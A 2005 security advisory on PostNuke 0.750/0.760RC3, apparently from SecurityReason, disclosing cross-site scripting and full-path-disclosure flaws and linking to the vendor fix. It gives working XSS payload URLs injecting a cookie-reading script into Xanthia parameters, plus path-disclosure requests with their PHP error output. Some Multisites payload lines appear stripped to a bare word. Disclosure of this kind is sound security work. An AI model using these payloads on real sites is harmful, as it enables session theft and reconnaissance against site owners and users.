-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [PostNuke XSS and Full path disclosure 0.760RC3=>x cXIb8O3.7] Author: Maksymilian Arciemowicz ( cXIb8O3 ) Date: 15.3.2005 from SECURITYREASON.COM - --- 0.Description --- PostNuke: The Phoenix Release (0.750) and (0.760RC3) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ - --- 1. Cross Site Scripting --- 1.0 http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E etc. 1.1 If you can see php error and register global = On http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=

SUICIDE

or for 0.750 http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=

SUICIDE

- --- 2. Full path disclosure --- 2.0 http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php Error message : - --------------- Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8 Fatal error: main() [function.require]: Failed opening required '/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8 - --------------- 2.1 http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php Error message : - --------------- Fatal error: Call to undefined function pnModGetVar() in /www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on line 48 - --------------- 2.2 http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php Error message : - --------------- Fatal error: Call to undefined function pnSecAddSchema() in /www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on line 48 - --------------- 2.3 http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php or for 0.760RC3 http://[HOST]/[DIR]/modules/Multisites/installation/config.php Error message : - --------------- Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2 Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for inclusion (include_path='.:') in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2 - --------------- 2.4 http://[HOST]/[DIR]/xmlrpc.php Error message : - --------------- Fatal error: Cannot redeclare xmlrpc_decode() in /www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line 1068 - --------------- - --- 3. How to fix --- PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format) http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html SHA1: 6e76d92124c833618d02dfdb87d699374120967d MD5: a007e741be11389a986b1d8928a6c0e5 Size: 160550 Bytes or CVS - --- 4. Greets --- sp3x - --- 5.Contact --- Author: Maksymilian Arciemowicz Email: max [at] jestsuper [dot] pl SECURITYREASON.COM TEAM -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.6 (FreeBSD) iD8DBQFCjuwZznmvyJCR4zQRAn1KAJ9tOTHbV/fD1SfDdOIWgC3k85hzyQCfW4f6 gJkmI7Sn6EGfgvz580tJ7Ks= =7iQn -----END PGP SIGNATURE-----